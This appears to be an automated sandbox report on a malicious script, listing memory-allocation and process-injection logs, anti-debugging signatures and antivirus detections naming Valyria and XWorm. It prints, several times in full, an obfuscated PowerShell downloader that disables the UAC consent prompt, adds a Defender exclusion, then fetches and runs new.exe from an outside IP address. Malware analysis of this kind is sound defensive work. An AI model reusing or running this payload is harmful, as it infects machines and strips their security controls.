base_address: 0x04a26000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a27000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a28000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a29000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhjsuSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd}else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPwq){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference -ExclusionPath $xsXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $obJQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQUWuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594,33595,33587,33590,33592,33587,33590,33590,33593,33588,33651,33642,33660,33587,33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;;}enAxnkDfhW;" uac
cmdline powershell.exe -ExecutionPolicy UnRestricted function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhjsuSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd}else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPwq){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference -ExclusionPath $xsXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $obJQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQUWuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594,33595,33587,33590,33592,33587,33590,33590,33593,33588,33651,33642,33660,33587,33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;;}enAxnkDfhW;" uac
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhjsuSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd}else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPwq){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference -ExclusionPath $xsXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $obJQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQUWuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594,33595,33587,33590,33592,33587,33590,33590,33593,33588,33651,33642,33660,33587,33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;;}enAxnkDfhW;" uac
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1188
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 210.56.13.114
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\new.exe
Process injection Process 1188 resumed a thread in remote process 2060
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000314
suspend_count: 1
process_identifier: 2060
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
dead_host 210.56.13.114:80
Lionic Trojan.Script.Valyria.4!c
CTX vba.trojan.valyria
Skyhigh BehavesLike.HTML.Dropper.lx
McAfee HTA/Downloader.f
VIPRE VB:Trojan.Valyria.7482
Arcabit VB:Trojan.Valyria.D1D3A
Symantec Trojan.Gen.NPE
ESET-NOD32 VBS/Agent.QVR
TrendMicro-HouseCall Backdoor.VBS.XWORM.YXEJUZ
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.7482
MicroWorld-eScan VB:Trojan.Valyria.7482
Rising Downloader.Agent/PS!8.1250D (TOPIS:E0:0P7JYgJNCDO)
Emsisoft VB:Trojan.Valyria.7482 (B)
DrWeb Trojan.Siggen29.56582
TrendMicro Backdoor.VBS.XWORM.YXEJUZ
Ikarus Trojan.VBS.Agent
FireEye VB:Trojan.Valyria.7482
Google Detected
Kingsoft Script.Trojan.Generic.a
Gridinsoft Malware.U.XWorm.tr
Microsoft Trojan:Script/Wacatac.B!ml
ZoneAlarm HEUR:Trojan.Script.SAgent.gen
GData VB:Trojan.Valyria.7482
Tencent Script.Trojan.Generic.Rzfl
huorong Trojan/VBS.Starter.x
Fortinet VBS/Agent.QVR!tr
AVG Script:SNH-gen [Drp]
alibabacloud Trojan:Win/Valyria.Gen